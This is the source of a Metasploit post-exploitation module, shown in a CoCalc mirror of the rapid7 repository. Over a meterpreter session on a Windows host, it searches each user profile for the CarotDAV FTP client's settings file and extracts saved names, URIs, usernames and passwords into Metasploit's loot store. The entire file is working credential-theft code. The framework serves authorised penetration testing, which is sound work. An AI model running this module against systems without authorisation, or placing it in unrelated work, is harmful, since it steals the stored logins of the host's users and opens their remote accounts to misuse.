Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/carotdav_ftp.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::Windows::Packrat

10
  ARTIFACTS =

11
    {

12
      application: 'CarotDAV',

13
      app_category: 'FTP',

14
      gatherable_artifacts: [

15
        {

16
          filetypes: 'logins',

17
          path: 'AppData',

18
          dir: 'Rei Software',

19
          artifact_file_name: 'Setting',

20
          description: 'Saved Bookmarks',

21
          credential_type: 'xml',

22
          xml_search: [

23
            {

24
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

25
              extraction_type: 'credentials',

26
              xml: [

27
                '//Name',

28
                '//TargetUri',

29
                '//UserName',

30
                '//Password'

31
              ]

32
            }

33
          ]

34
        }

35
      ]

36
    }.freeze

37


38
  def initialize(info = {})

39
    super(

40
      update_info(

41
        info,

42
        'Name' => 'CarotDAV Credential Gatherer',

43
        'Description' => %q{

44
          This module searches for credentials stored on CarotDAV FTP Client on a Windows host.

45
        },

46
        'License' => MSF_LICENSE,

47
        'Author' => [

48
          'Jacob Tierney',

49
          'Kazuyoshi Maruta',

50
          'Daniel Hallsworth',

51
          'Barwar Salim M',

52
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

53
        ],

54
        'Platform' => ['win'],

55
        'SessionTypes' => ['meterpreter'],

56
        'Notes' => {

57
          'Stability' => [CRASH_SAFE],

58
          'Reliability' => [],

59
          'SideEffects' => []

60
        }

61
      )

62
    )

63


64
    register_options(

65
      [

66
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

67
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

68
        # enumerates the options based on the artifacts that are defined below

69
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])

70
      ]

71
    )

72
  end

73


74
  def run

75
    print_status('Filtering based on these selections:  ')

76
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

77
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

78
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

79


80
    # used to grab files for each user on the remote host

81
    grab_user_profiles.each do |userprofile|

82
      run_packrat(userprofile, ARTIFACTS)

83
    end

84


85
    print_status 'PackRat credential sweep completed'

86
  end

87
end

88


89